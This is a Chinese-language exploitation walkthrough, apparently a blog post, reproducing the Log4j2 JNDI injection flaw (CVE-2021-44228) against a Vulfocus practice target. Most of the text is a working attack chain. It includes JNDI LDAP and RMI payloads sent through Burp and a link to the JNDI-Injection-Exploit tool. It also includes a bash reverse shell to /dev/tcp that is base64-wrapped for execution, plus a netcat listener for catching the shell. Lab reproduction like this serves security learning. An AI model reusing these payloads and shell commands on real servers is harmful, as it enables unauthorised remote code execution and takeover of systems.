【Vulfocus漏洞复现】log4j2-cve-2021-44228-爱代码爱编程
vps:centos8 腾讯云
本地:windows11
靶场环境:http://123.58.236.76:64936/
访问靶场环境http://123.58.236.76:64936/
点击???
burp抓包,DNSlog验证漏洞是否存在
构造payload=${jndi:ldap://7272sq.ceye.io},并在burp中请求数据,返回400
payload=${jndi:ldap://7272sq.ceye.io}
对payload进行url编码(burp自带),再次进行请求,出现200,DNSlog中出现记录,证明漏洞存在
使用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar进行漏洞利用,下载地址:
https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0
使用方式
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [vps的ip]
反弹shell指令(xxxxx为vps的ip,5555为任意未占用的端口)
bash -i >& /dev/tcp/xxxxx/5555 0>&1
将上述命令base64编码
然后在vps开启开启两个窗口
窗口1输入(aaaaa为刚刚base64编码后的反弹shell指令,xxxxx为vps的ip)
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,aaaaa}|{base64,-d}|{bash,-i}" -A xxxxx
窗口2输入
nc -lvvp 5555
burp中构造payload=${jndi:rmi://xxxxx/zpm6mz}
payload=${jndi:rmi://xxxxx/zpm6mz}
再次对payload进行url编码,再次请求,反弹shell